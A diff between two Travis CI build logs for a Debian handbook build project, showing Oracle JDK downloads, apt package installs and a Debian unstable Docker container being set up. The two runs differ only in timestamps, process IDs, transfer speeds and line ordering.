 Location: https://edelivery.oracle.com/otn-pub/java/jdk/8u201-b09/42970487e3af4f5aa5bca3f542482c60/jdk-8u201-linux-x64.tar.gz [following]
---2019-02-17 04:40:14--  https://edelivery.oracle.com/otn-pub/java/jdk/8u201-b09/42970487e3af4f5aa5bca3f542482c60/jdk-8u201-linux-x64.tar.gz
+--2019-02-17 10:47:23--  https://edelivery.oracle.com/otn-pub/java/jdk/8u201-b09/42970487e3af4f5aa5bca3f542482c60/jdk-8u201-linux-x64.tar.gz
 Resolving edelivery.oracle.com (edelivery.oracle.com)... 172.226.78.17, 2600:1407:10:280::366, 2600:1407:10:28a::366
 Connecting to edelivery.oracle.com (edelivery.oracle.com)|172.226.78.17|:443... connected.
 HTTP request sent, awaiting response... 302 Moved Temporarily
-Location: http://download.oracle.com/otn-pub/java/jdk/8u201-b09/42970487e3af4f5aa5bca3f542482c60/jdk-8u201-linux-x64.tar.gz?AuthParam=1550378534_58416db5a925daef475f3095daf04f7b [following]
---2019-02-17 04:40:15--  http://download.oracle.com/otn-pub/java/jdk/8u201-b09/42970487e3af4f5aa5bca3f542482c60/jdk-8u201-linux-x64.tar.gz?AuthParam=1550378534_58416db5a925daef475f3095daf04f7b
-Connecting to download.oracle.com (download.oracle.com)|184.26.42.134|:80... connected.
+Location: http://download.oracle.com/otn-pub/java/jdk/8u201-b09/42970487e3af4f5aa5bca3f542482c60/jdk-8u201-linux-x64.tar.gz?AuthParam=1550400563_01b4e0423f04647b68f9985252a4cb1a [following]
+--2019-02-17 10:47:23--  http://download.oracle.com/otn-pub/java/jdk/8u201-b09/42970487e3af4f5aa5bca3f542482c60/jdk-8u201-linux-x64.tar.gz?AuthParam=1550400563_01b4e0423f04647b68f9985252a4cb1a
+Connecting to download.oracle.com (download.oracle.com)|172.226.97.6|:80... connected.
 HTTP request sent, awaiting response... 301 Moved Permanently
-Location: https://download.oracle.com/otn-pub/java/jdk/8u201-b09/42970487e3af4f5aa5bca3f542482c60/jdk-8u201-linux-x64.tar.gz?AuthParam=1550378534_58416db5a925daef475f3095daf04f7b [following]
---2019-02-17 04:40:15--  https://download.oracle.com/otn-pub/java/jdk/8u201-b09/42970487e3af4f5aa5bca3f542482c60/jdk-8u201-linux-x64.tar.gz?AuthParam=1550378534_58416db5a925daef475f3095daf04f7b
-Connecting to download.oracle.com (download.oracle.com)|184.26.42.134|:443... connected.
+Location: https://download.oracle.com/otn-pub/java/jdk/8u201-b09/42970487e3af4f5aa5bca3f542482c60/jdk-8u201-linux-x64.tar.gz?AuthParam=1550400563_01b4e0423f04647b68f9985252a4cb1a [following]
+--2019-02-17 10:47:23--  https://download.oracle.com/otn-pub/java/jdk/8u201-b09/42970487e3af4f5aa5bca3f542482c60/jdk-8u201-linux-x64.tar.gz?AuthParam=1550400563_01b4e0423f04647b68f9985252a4cb1a
+Connecting to download.oracle.com (download.oracle.com)|172.226.97.6|:443... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 191817140 (183M) [application/x-gzip]
 Saving to: 'jdk-8u201-linux-x64.tar.gz'
 
-     0K ........ ........ ........ ........ ........ ........  1% 9.22M 20s
-  3072K ........ ........ ........ ........ ........ ........  3% 16.8M 15s
-  6144K ........ ........ ........ ........ ........ ........  4% 15.0M 14s
-  9216K ........ ........ ........ ........ ........ ........  6% 28.5M 12s
- 12288K ........ ........ ........ ........ ........ ........  8% 31.0M 10s
- 15360K ........ ........ ........ ........ ........ ........  9% 33.5M 9s
- 18432K ........ ........ ........ ........ ........ ........ 11% 22.8M 9s
- 21504K ........ ........ ........ ........ ........ ........ 13% 52.1M 8s
- 24576K ........ ........ ........ ........ ........ ........ 14% 49.4M 7s
- 27648K ........ ........ ........ ........ ........ ........ 16% 45.2M 7s
- 30720K ........ ........ ........ ........ ........ ........ 18% 35.8M 6s
- 33792K ........ ........ ........ ........ ........ ........ 19% 44.1M 6s
- 36864K ........ ........ ........ ........ ........ ........ 21% 33.1M 6s
- 39936K ........ ........ ........ ........ ........ ........ 22% 48.7M 5s
- 43008K ........ ........ ........ ........ ........ ........ 24% 33.5M 5s
- 46080K ........ ........ ........ ........ ........ ........ 26% 47.0M 5s
- 49152K ........ ........ ........ ........ ........ ........ 27% 39.0M 5s
- 52224K ........ ........ ........ ........ ........ ........ 29% 27.5M 5s
- 55296K ........ ........ ........ ........ ........ ........ 31% 32.0M 5s
- 58368K ........ ........ ........ ........ ........ ........ 32% 32.3M 4s
- 61440K ........ ........ ........ ........ ........ ........ 34% 19.4M 4s
- 64512K ........ ........ ........ ........ ........ ........ 36% 55.3M 4s
- 67584K ........ ........ ........ ........ ........ ........ 37% 40.2M 4s
- 70656K ........ ........ ........ ........ ........ ........ 39% 58.8M 4s
- 73728K ........ ........ ........ ........ ........ ........ 40% 27.8M 4s
- 76800K ........ ........ ........ ........ ........ ........ 42% 44.0M 4s
- 79872K ........ ........ ........ ........ ........ ........ 44% 32.5M 3s
- 82944K ........ ........ ........ ........ ........ ........ 45% 62.6M 3s
- 86016K ........ ........ ........ ........ ........ ........ 47% 44.2M 3s
- 89088K ........ ........ ........ ........ ........ ........ 49% 45.4M 3s
- 92160K ........ ........ ........ ........ ........ ........ 50% 41.9M 3s
- 95232K ........ ........ ........ ........ ........ ........ 52% 73.2M 3s
- 98304K ........ ........ ........ ........ ........ ........ 54% 37.9M 3s
-101376K ........ ........ ........ ........ ........ ........ 55% 54.9M 3s
-104448K ........ ........ ........ ........ ........ ........ 57% 39.6M 2s
-107520K ........ ........ ........ ........ ........ ........ 59% 34.1M 2s
-110592K ........ ........ ........ ........ ........ ........ 60% 36.9M 2s
-113664K ........ ........ ........ ........ ........ ........ 62% 59.7M 2s
-116736K ........ ........ ........ ........ ........ ........ 63% 30.4M 2s
-119808K ........ ........ ........ ........ ........ ........ 65% 62.8M 2s
-122880K ........ ........ ........ ........ ........ ........ 67% 40.9M 2s
-125952K ........ ........ ........ ........ ........ ........ 68% 38.5M 2s
-129024K ........ ........ ........ ........ ........ ........ 70% 39.7M 2s
-132096K ........ ........ ........ ........ ........ ........ 72% 43.4M 2s
-135168K ........ ........ ........ ........ ........ ........ 73% 45.1M 1s
-138240K ........ ........ ........ ........ ........ ........ 75% 72.0M 1s
-141312K ........ ........ ........ ........ ........ ........ 77% 51.3M 1s
-144384K ........ ........ ........ ........ ........ ........ 78% 49.6M 1s
-147456K ........ ........ ........ ........ ........ ........ 80% 25.9M 1s
-150528K ........ ........ ........ ........ ........ ........ 81% 43.6M 1s
-153600K ........ ........ ........ ........ ........ ........ 83% 36.3M 1s
-156672K ........ ........ ........ ........ ........ ........ 85% 61.4M 1s
-159744K ........ ........ ........ ........ ........ ........ 86% 45.9M 1s
-162816K ........ ........ ........ ........ ........ ........ 88% 75.7M 1s
-165888K ........ ........ ........ ........ ........ ........ 90% 35.3M 1s
-168960K ........ ........ ........ ........ ........ ........ 91% 57.8M 0s
-172032K ........ ........ ........ ........ ........ ........ 93% 27.0M 0s
-175104K ........ ........ ........ ........ ........ ........ 95% 32.2M 0s
-178176K ........ ........ ........ ........ ........ ........ 96% 44.5M 0s
-181248K ........ ........ ........ ........ ........ ........ 98% 60.4M 0s
-184320K ........ ........ ........ ........ ........ ......  100% 35.4M=5.1s
+     0K ........ ........ ........ ........ ........ ........  1% 17.6M 10s
+  3072K ........ ........ ........ ........ ........ ........  3% 28.1M 8s
+  6144K ........ ........ ........ ........ ........ ........  4% 16.0M 9s
+  9216K ........ ........ ........ ........ ........ ........  6% 28.1M 8s
+ 12288K ........ ........ ........ ........ ........ ........  8% 15.8M 9s
+ 15360K ........ ........ ........ ........ ........ ........  9% 28.1M 8s
+ 18432K ........ ........ ........ ........ ........ ........ 11% 15.2M 8s
+ 21504K ........ ........ ........ ........ ........ ........ 13% 27.5M 8s
+ 24576K ........ ........ ........ ........ ........ ........ 14% 15.8M 8s
+ 27648K ........ ........ ........ ........ ........ ........ 16% 27.5M 8s
+ 30720K ........ ........ ........ ........ ........ ........ 18% 15.7M 8s
+ 33792K ........ ........ ........ ........ ........ ........ 19% 24.5M 7s
+ 36864K ........ ........ ........ ........ ........ ........ 21% 15.7M 7s
+ 39936K ........ ........ ........ ........ ........ ........ 22% 27.9M 7s
+ 43008K ........ ........ ........ ........ ........ ........ 24% 15.7M 7s
+ 46080K ........ ........ ........ ........ ........ ........ 26% 69.0M 7s
+ 49152K ........ ........ ........ ........ ........ ........ 27% 47.4M 6s
+ 52224K ........ ........ ........ ........ ........ ........ 29% 59.2M 6s
+ 55296K ........ ........ ........ ........ ........ ........ 31% 50.0M 6s
+ 58368K ........ ........ ........ ........ ........ ........ 32% 59.9M 5s
+ 61440K ........ ........ ........ ........ ........ ........ 34% 23.4M 5s
+ 64512K ........ ........ ........ ........ ........ ........ 36% 66.3M 5s
+ 67584K ........ ........ ........ ........ ........ ........ 37% 49.3M 5s
+ 70656K ........ ........ ........ ........ ........ ........ 39% 66.4M 4s
+ 73728K ........ ........ ........ ........ ........ ........ 40% 49.2M 4s
+ 76800K ........ ........ ........ ........ ........ ........ 42% 28.4M 4s
+ 79872K ........ ........ ........ ........ ........ ........ 44% 48.8M 4s
+ 82944K ........ ........ ........ ........ ........ ........ 45% 65.7M 4s
+ 86016K ........ ........ ........ ........ ........ ........ 47% 50.2M 3s
+ 89088K ........ ........ ........ ........ ........ ........ 49% 61.9M 3s
+ 92160K ........ ........ ........ ........ ........ ........ 50% 48.8M 3s
+ 95232K ........ ........ ........ ........ ........ ........ 52% 70.0M 3s
+ 98304K ........ ........ ........ ........ ........ ........ 54% 23.7M 3s
+101376K ........ ........ ........ ........ ........ ........ 55% 28.0M 3s
+104448K ........ ........ ........ ........ ........ ........ 57% 23.8M 3s
+107520K ........ ........ ........ ........ ........ ........ 59% 67.9M 3s
+110592K ........ ........ ........ ........ ........ ........ 60% 23.9M 2s
+113664K ........ ........ ........ ........ ........ ........ 62% 27.0M 2s
+116736K ........ ........ ........ ........ ........ ........ 63% 24.4M 2s
+119808K ........ ........ ........ ........ ........ ........ 65% 67.5M 2s
+122880K ........ ........ ........ ........ ........ ........ 67% 15.7M 2s
+125952K ........ ........ ........ ........ ........ ........ 68% 28.0M 2s
+129024K ........ ........ ........ ........ ........ ........ 70% 23.2M 2s
+132096K ........ ........ ........ ........ ........ ........ 72% 55.1M 2s
+135168K ........ ........ ........ ........ ........ ........ 73% 23.4M 2s
+138240K ........ ........ ........ ........ ........ ........ 75% 27.6M 2s
+141312K ........ ........ ........ ........ ........ ........ 77% 23.7M 1s
+144384K ........ ........ ........ ........ ........ ........ 78% 68.4M 1s
+147456K ........ ........ ........ ........ ........ ........ 80% 50.4M 1s
+150528K ........ ........ ........ ........ ........ ........ 81% 27.5M 1s
+153600K ........ ........ ........ ........ ........ ........ 83% 23.1M 1s
+156672K ........ ........ ........ ........ ........ ........ 85% 67.7M 1s
+159744K ........ ........ ........ ........ ........ ........ 86% 23.5M 1s
+162816K ........ ........ ........ ........ ........ ........ 88% 27.9M 1s
+165888K ........ ........ ........ ........ ........ ........ 90% 44.5M 1s
+168960K ........ ........ ........ ........ ........ ........ 91% 67.8M 1s
+172032K ........ ........ ........ ........ ........ ........ 93% 23.0M 0s
+175104K ........ ........ ........ ........ ........ ........ 95% 28.0M 0s
+178176K ........ ........ ........ ........ ........ ........ 96% 22.9M 0s
+181248K ........ ........ ........ ........ ........ ........ 98% 66.5M 0s
+184320K ........ ........ ........ ........ ........ ......  100% 23.8M=6.2s
 
-2019-02-17 04:40:20 (35.9 MB/s) - 'jdk-8u201-linux-x64.tar.gz' saved [191817140/191817140]
+2019-02-17 10:47:30 (29.4 MB/s) - 'jdk-8u201-linux-x64.tar.gz' saved [191817140/191817140]
 
 Download done.
 Removing outdated cached downloads...
@@ -1938,7 +1938,7 @@ Setting up udev (204-5ubuntu20.29) ...
 0
 + exit 0
 udev stop/waiting
-udev start/running, process 26745
+udev start/running, process 25825
 Removing 'diversion of /bin/udevadm to /bin/udevadm.upgrade by fake-udev'
 update-initramfs: deferring update (trigger activated)
 Setting up initramfs-tools-bin (0.103ubuntu4.11) ...
@@ -2027,29 +2027,29 @@ Setting up tzdata-java (2018i-0ubuntu0.14.04) ...
 Setting up oracle-java8-unlimited-jce-policy (8u201-1~webupd8~1) ...
 Using wget settings from /var/cache/oracle-jdk8-installer/wgetrc
 Downloading Unlimited JCE Policy for Oracle Java 8...
---2019-02-17 04:41:15--  http://download.oracle.com/otn-pub/java/jce/8/jce_policy-8.zip
+--2019-02-17 10:48:25--  http://download.oracle.com/otn-pub/java/jce/8/jce_policy-8.zip
 Resolving download.oracle.com (download.oracle.com)... 184.26.42.134
 Connecting to download.oracle.com (download.oracle.com)|184.26.42.134|:80... connected.
 HTTP request sent, awaiting response... 302 Moved Temporarily
 Location: https://edelivery.oracle.com/otn-pub/java/jce/8/jce_policy-8.zip [following]
---2019-02-17 04:41:15--  https://edelivery.oracle.com/otn-pub/java/jce/8/jce_policy-8.zip
-Resolving edelivery.oracle.com (edelivery.oracle.com)... 172.226.78.17, 2600:1407:10:28a::366, 2600:1407:10:280::366
+--2019-02-17 10:48:25--  https://edelivery.oracle.com/otn-pub/java/jce/8/jce_policy-8.zip
+Resolving edelivery.oracle.com (edelivery.oracle.com)... 172.226.78.17, 2600:1407:10:280::366, 2600:1407:10:28a::366
 Connecting to edelivery.oracle.com (edelivery.oracle.com)|172.226.78.17|:443... connected.
 HTTP request sent, awaiting response... 302 Moved Temporarily
-Location: http://download.oracle.com/otn-pub/java/jce/8/jce_policy-8.zip?AuthParam=1550378595_306994c8b2d0489ec3d3c6bb02471207 [following]
---2019-02-17 04:41:15--  http://download.oracle.com/otn-pub/java/jce/8/jce_policy-8.zip?AuthParam=1550378595_306994c8b2d0489ec3d3c6bb02471207
+Location: http://download.oracle.com/otn-pub/java/jce/8/jce_policy-8.zip?AuthParam=1550400625_409a936d560a10fe1ad2ada95071050f [following]
+--2019-02-17 10:48:25--  http://download.oracle.com/otn-pub/java/jce/8/jce_policy-8.zip?AuthParam=1550400625_409a936d560a10fe1ad2ada95071050f
 Connecting to download.oracle.com (download.oracle.com)|184.26.42.134|:80... connected.
 HTTP request sent, awaiting response... 301 Moved Permanently
-Location: https://download.oracle.com/otn-pub/java/jce/8/jce_policy-8.zip?AuthParam=1550378595_306994c8b2d0489ec3d3c6bb02471207 [following]
---2019-02-17 04:41:15--  https://download.oracle.com/otn-pub/java/jce/8/jce_policy-8.zip?AuthParam=1550378595_306994c8b2d0489ec3d3c6bb02471207
+Location: https://download.oracle.com/otn-pub/java/jce/8/jce_policy-8.zip?AuthParam=1550400625_409a936d560a10fe1ad2ada95071050f [following]
+--2019-02-17 10:48:25--  https://download.oracle.com/otn-pub/java/jce/8/jce_policy-8.zip?AuthParam=1550400625_409a936d560a10fe1ad2ada95071050f
 Connecting to download.oracle.com (download.oracle.com)|184.26.42.134|:443... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 8409 (8.2K) [application/zip]
 Saving to: 'jce_policy-8.zip'
 
-     0K                                                      100%  110M=0s
+     0K                                                      100% 15.1M=0.001s
 
-2019-02-17 04:41:15 (110 MB/s) - 'jce_policy-8.zip' saved [8409/8409]
+2019-02-17 10:48:26 (15.1 MB/s) - 'jce_policy-8.zip' saved [8409/8409]
 
 Download done.
 Removing outdated cached downloads...
@@ -2133,7 +2133,7 @@ Setting up openssh-server (1:6.6p1-2ubuntu2.12) ...
 0
 + exit 0
 ssh stop/waiting
-ssh start/running, process 30276
+ssh start/running, process 29362
 Setting up python-apt-common (0.9.3.5ubuntu3) ...
 Setting up python3-apt (0.9.3.5ubuntu3) ...
 Setting up rsync (3.1.0-2ubuntu0.4) ...
@@ -2423,16 +2423,16 @@ The following packages will be upgraded:
 8 upgraded, 9 newly installed, 0 to remove and 0 not upgraded.
 Need to get 158 MB of archives.
 After this operation, 351 MB of additional disk space will be used.
-Get:1 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-client-11 amd64 11.2-1.pgdg14.04+1 [1393 kB]
-Get:2 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libboost-regex1.54.0 amd64 1.54.0-4ubuntu3.1 [261 kB]
-Get:3 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-client all 11+199.pgdg14.04+1 [59.8 kB]
-Get:4 https://download.docker.com/linux/ubuntu trusty/stable amd64 docker-ce amd64 18.06.2~ce~3-0~ubuntu [39.7 MB]
+Get:1 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 libboost-regex1.54.0 amd64 1.54.0-4ubuntu3.1 [261 kB]
+Get:2 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/universe amd64 pigz amd64 2.3-2 [59.4 kB]
+Get:3 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ubuntu-advantage-tools all 10ubuntu0.14.04.2 [11.5 kB]
+Get:4 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-client-11 amd64 11.2-1.pgdg14.04+1 [1393 kB]
 Get:5 http://dl.google.com/linux/chrome/deb stable/main amd64 google-chrome-stable amd64 72.0.3626.109-1 [57.3 MB]
-Get:6 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/universe amd64 pigz amd64 2.3-2 [59.4 kB]
-Get:7 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ubuntu-advantage-tools all 10ubuntu0.14.04.2 [11.5 kB]
-Get:8 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ubuntu-minimal amd64 1.325.1 [2658 B]
-Get:9 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/multiverse amd64 iucode-tool amd64 1.0.1-1 [28.1 kB]
-Get:10 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 linux-image-4.4.0-142-generic amd64 4.4.0-142.168~14.04.1 [21.2 MB]
+Get:6 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 ubuntu-minimal amd64 1.325.1 [2658 B]
+Get:7 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/multiverse amd64 iucode-tool amd64 1.0.1-1 [28.1 kB]
+Get:8 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 linux-image-4.4.0-142-generic amd64 4.4.0-142.168~14.04.1 [21.2 MB]
+Get:9 https://download.docker.com/linux/ubuntu trusty/stable amd64 docker-ce amd64 18.06.2~ce~3-0~ubuntu [39.7 MB]
+Get:10 http://apt.postgresql.org/pub/repos/apt trusty-pgdg/main amd64 postgresql-client all 11+199.pgdg14.04+1 [59.8 kB]
 Get:11 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 linux-image-extra-4.4.0-142-generic amd64 4.4.0-142.168~14.04.1 [36.2 MB]
 Get:12 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 intel-microcode amd64 3.20180807a.0ubuntu0.14.04.1 [1275 kB]
 Get:13 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 amd64-microcode amd64 3.20180524.1~ubuntu0.14.04.2+really20130710.1ubuntu1 [26.3 kB]
@@ -2440,7 +2440,7 @@ Get:14 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64
 Get:15 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/universe amd64 google-compute-engine-oslogin amd64 20190124+dfsg1-0ubuntu1~14.04.0 [93.3 kB]
 Get:16 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/universe amd64 gce-compute-image-packages all 20190124+dfsg1-0ubuntu1~14.04.0 [11.9 kB]
 Get:17 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/universe amd64 python-google-compute-engine all 20190124+dfsg1-0ubuntu1~14.04.0 [33.2 kB]
-Fetched 158 MB in 3s (47.1 MB/s)
+Fetched 158 MB in 7s (21.0 MB/s)
 (Reading database ... 
(Reading database ... 5%
(Reading database ... 10%
(Reading database ... 15%
(Reading database ... 20%
(Reading database ... 25%
(Reading database ... 30%
(Reading database ... 35%
(Reading database ... 40%
(Reading database ... 45%
(Reading database ... 50%
(Reading database ... 55%
(Reading database ... 60%
(Reading database ... 65%
(Reading database ... 70%
(Reading database ... 75%
(Reading database ... 80%
(Reading database ... 85%
(Reading database ... 90%
(Reading database ... 95%
(Reading database ... 100%
(Reading database ... 93758 files and directories currently installed.)
 Preparing to unpack .../google-chrome-stable_72.0.3626.109-1_amd64.deb ...
 Unpacking google-chrome-stable (72.0.3626.109-1) over (62.0.3202.94-1) ...
@@ -2515,7 +2515,7 @@ Installing new version of config file /etc/bash_completion.d/docker ...
 + expr docker : postgresql.*
 0
 + exit 0
-docker start/running, process 6914
+docker start/running, process 5998
 Setting up iucode-tool (1.0.1-1) ...
 Setting up linux-image-4.4.0-142-generic (4.4.0-142.168~14.04.1) ...
 Running depmod.
@@ -2581,15 +2581,15 @@ google-clock-skew-daemon stop/waiting
 + expr google-accounts-daemon : postgresql.*
 0
 + exit 0
-google-accounts-daemon start/running, process 27209
+google-accounts-daemon start/running, process 26298
 + expr google-clock-skew-daemon : postgresql.*
 0
 + exit 0
-google-clock-skew-daemon start/running, process 27247
+google-clock-skew-daemon start/running, process 26336
 + expr google-network-daemon : postgresql.*
 0
 + exit 0
-google-network-daemon start/running, process 27285
+google-network-daemon start/running, process 26382
 Processing triggers for libc-bin (2.19-0ubuntu6.14) ...
 Processing triggers for initramfs-tools (0.103ubuntu4.11) ...
 update-initramfs: Not updating initramfs.
@@ -2622,7 +2622,7 @@ Get:5 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty/universe amd64 debia
 Get:6 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 schroot-common all 1.6.8-1ubuntu1.1 [4298 B]
 Get:7 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 schroot amd64 1.6.8-1ubuntu1.1 [554 kB]
 Get:8 http://us-east-1.ec2.archive.ubuntu.com/ubuntu trusty-updates/main amd64 debootstrap all 1.0.59ubuntu0.12 [29.6 kB]
-Fetched 49.5 MB in 5s (9559 kB/s)
+Fetched 49.5 MB in 1s (34.6 MB/s)
 Selecting previously unselected package libboost-system1.54.0:amd64.
 (Reading database ... 
(Reading database ... 5%
(Reading database ... 10%
(Reading database ... 15%
(Reading database ... 20%
(Reading database ... 25%
(Reading database ... 30%
(Reading database ... 35%
(Reading database ... 40%
(Reading database ... 45%
(Reading database ... 50%
(Reading database ... 55%
(Reading database ... 60%
(Reading database ... 65%
(Reading database ... 70%
(Reading database ... 75%
(Reading database ... 80%
(Reading database ... 85%
(Reading database ... 90%
(Reading database ... 95%
(Reading database ... 100%
(Reading database ... 99841 files and directories currently installed.)
 Preparing to unpack .../libboost-system1.54.0_1.54.0-4ubuntu3.1_amd64.deb ...
@@ -2729,7 +2729,7 @@ unstable: Pulling from library/debian
 Digest: sha256:429d11de17278e9d030e04dab3895161ae6fd9a229dded6483ccd7856274dea7
 Status: Downloaded newer image for debian:unstable
 +docker run --detach --name debian_unstable --volume /root/:/root/ --volume /home/:/home/ --rm --interactive --tty debian:unstable bash
-88f3f21cf84b24df05ba72395369d1e8514a627fd240eca2f17e945f0231fcc1
+85f7c32064cefeb1d56dd697295ead29ccb51d5760613b6569817145618412c2
 +docker exec debian_unstable useradd -u 2000 -d /home/travis travis
 +docker exec debian_unstable /home/travis/build/l/debian-handbook-test/.travis/script.sh systems:build/setup
 + set -eu
@@ -2806,6 +2806,7 @@ Status: Downloaded newer image for debian:unstable
 + return 0
 + configure_identity
 + id
+uid=0(root) gid=0(root) groups=0(root)
 + id --user --name
 + readonly CURRENT_USER=root
 + id --user
@@ -2813,32 +2814,31 @@ Status: Downloaded newer image for debian:unstable
 + id --group --name
 + readonly CURRENT_GROUP=root
 + id --group
-uid=0(root) gid=0(root) groups=0(root)
+buster/sid
 + readonly CURRENT_GROUP_ID=0
 + hostname
-+ readonly CURRENT_HOST=88f3f21cf84b
++ readonly CURRENT_HOST=85f7c32064ce
 + return 0
 + return 0
 + test root != root
 + apt_get_install git publican publican-debian openssh-client file libxml2-utils imagemagick
 + apt_get_install_pre
 + cat /etc/debian_version
-buster/sid
-+ apt-config dump
 + grep --regexp=APT::Install- --regexp=DPkg::options --regexp=APT::Get::
-+ apt-key list
++ apt-config dump
 APT::Install-Recommends "1";
 APT::Install-Suggests "0";
 Binary::apt::APT::Get::Upgrade-Allow-New "1";
 Binary::apt::APT::Get::Update "";
 Binary::apt::APT::Get::Update::InteractiveReleaseInfoChanges "1";
++ apt-key list
 E: gnupg, gnupg2 and gnupg1 do not seem to be installed, but one of them is required for this operation
-INFO: 0: apt-key: error
 + echo INFO: 0: apt-key: error
+INFO: 0: apt-key: error
 + apt-get update
 Get:1 http://cdn-fastly.deb.debian.org/debian unstable InRelease [242 kB]
 Get:2 http://cdn-fastly.deb.debian.org/debian unstable/main amd64 Packages [8369 kB]
-Fetched 8611 kB in 2s (4508 kB/s)
+Fetched 8611 kB in 2s (4370 kB/s)
 Reading package lists...
 + apt-cache policy
 Package files:
@@ -2891,7 +2891,7 @@ Get:26 http://cdn-fastly.deb.debian.org/debian unstable/main amd64 libcap2 amd64
 Get:27 http://cdn-fastly.deb.debian.org/debian unstable/main amd64 libcap2-bin amd64 1:2.25-2 [28.8 kB]
 Get:28 http://cdn-fastly.deb.debian.org/debian unstable/main amd64 libelf1 amd64 0.176-1 [160 kB]
 debconf: delaying package configuration, since apt-utils is not installed
-Fetched 10.8 MB in 1s (13.4 MB/s)
+Fetched 10.8 MB in 1s (18.4 MB/s)
 (Reading database ... 
(Reading database ... 5%
(Reading database ... 10%
(Reading database ... 15%
(Reading database ... 20%
(Reading database ... 25%
(Reading database ... 30%
(Reading database ... 35%
(Reading database ... 40%
(Reading database ... 45%
(Reading database ... 50%
(Reading database ... 55%
(Reading database ... 60%
(Reading database ... 65%
(Reading database ... 70%
(Reading database ... 75%
(Reading database ... 80%
(Reading database ... 85%
(Reading database ... 90%
(Reading database ... 95%
(Reading database ... 100%
(Reading database ... 6574 files and directories currently installed.)
 Preparing to unpack .../findutils_4.6.0+git+20190209-2_amd64.deb ...
 Unpacking findutils (4.6.0+git+20190209-2) over (4.6.0+git+20190105-2) ...
@@ -3692,7 +3692,7 @@ Get:427 http://cdn-fastly.deb.debian.org/debian unstable/main amd64 publicsuffix
 Get:428 http://cdn-fastly.deb.debian.org/debian unstable/main amd64 xauth amd64 1:1.0.10-1 [40.3 kB]
 Get:429 http://cdn-fastly.deb.debian.org/debian unstable/main amd64 xdg-user-dirs amd64 0.17-2 [53.8 kB]
 debconf: delaying package configuration, since apt-utils is not installed
-Fetched 204 MB in 19s (10.9 MB/s)
+Fetched 204 MB in 4s (51.6 MB/s)
 Selecting previously unselected package libapparmor1:amd64.
 (Reading database ... 
(Reading database ... 5%
(Reading database ... 10%
(Reading database ... 15%
(Reading database ... 20%
(Reading database ... 25%
(Reading database ... 30%
(Reading database ... 35%
(Reading database ... 40%
(Reading database ... 45%
(Reading database ... 50%
(Reading database ... 55%
(Reading database ... 60%
(Reading database ... 65%
(Reading database ... 70%
(Reading database ... 75%
(Reading database ... 80%
(Reading database ... 85%
(Reading database ... 90%
(Reading database ... 95%
(Reading database ... 100%
(Reading database ... 6643 files and directories currently installed.)
 Preparing to unpack .../00-libapparmor1_2.13.2-7_amd64.deb ...
@@ -5633,7 +5633,7 @@ Reading state information...
 + return 0
 + return 0
 + exit 0
-+docker exec --user travis debian_unstable /home/travis/build/l/debian-handbook-test/.travis/script.sh systems:build/repository/setup /home/travis/tmp/base.mKmY0h/build /home/travis/build/l/debian-handbook-test/.travis/weblate-sync.pl
++docker exec --user travis debian_unstable /home/travis/build/l/debian-handbook-test/.travis/script.sh systems:build/repository/setup /home/travis/tmp/base.D31sXm/build /home/travis/build/l/debian-handbook-test/.travis/weblate-sync.pl
 + set -eu
 + alias git_commit=git \
 	commit \
@@ -5689,12 +5689,12 @@ Reading state information...
 	--pretty 2 \
 	--output \
 
-+ main systems:build/repository/setup /home/travis/tmp/base.mKmY0h/build /home/travis/build/l/debian-handbook-test/.travis/weblate-sync.pl
++ main systems:build/repository/setup /home/travis/tmp/base.D31sXm/build /home/travis/build/l/debian-handbook-test/.travis/weblate-sync.pl
 + readonly MODE=systems:build/repository/setup
 + shift 1
-+ systems_build_repository_setup /home/travis/tmp/base.mKmY0h/build /home/travis/build/l/debian-handbook-test/.travis/weblate-sync.pl
-+ systems_build_repository_setup_pre /home/travis/tmp/base.mKmY0h/build /home/travis/build/l/debian-handbook-test/.travis/weblate-sync.pl
-+ readonly _GIT_WORK_TREE=/home/travis/tmp/base.mKmY0h/build
++ systems_build_repository_setup /home/travis/tmp/base.D31sXm/build /home/travis/build/l/debian-handbook-test/.travis/weblate-sync.pl
++ systems_build_repository_setup_pre /home/travis/tmp/base.D31sXm/build /home/travis/build/l/debian-handbook-test/.travis/weblate-sync.pl
++ readonly _GIT_WORK_TREE=/home/travis/tmp/base.D31sXm/build
 + readonly WEBLATE_SYNC=/home/travis/build/l/debian-handbook-test/.travis/weblate-sync.pl
 + configure_publican
 + readonly _PUBLICAN_SURNAME=AYANOKOUZI
@@ -5734,10 +5734,10 @@ Reading state information...
 + readonly _GIT_LOCAL_GITHUB_BRANCH=stretch/master/gh-pages
 + return 0
 + return 0
-+ cd /home/travis/tmp/base.mKmY0h/build
++ cd /home/travis/tmp/base.D31sXm/build
 + setup_build_dir
 + git init
-Initialized empty Git repository in /home/travis/tmp/base.mKmY0h/build/.git/
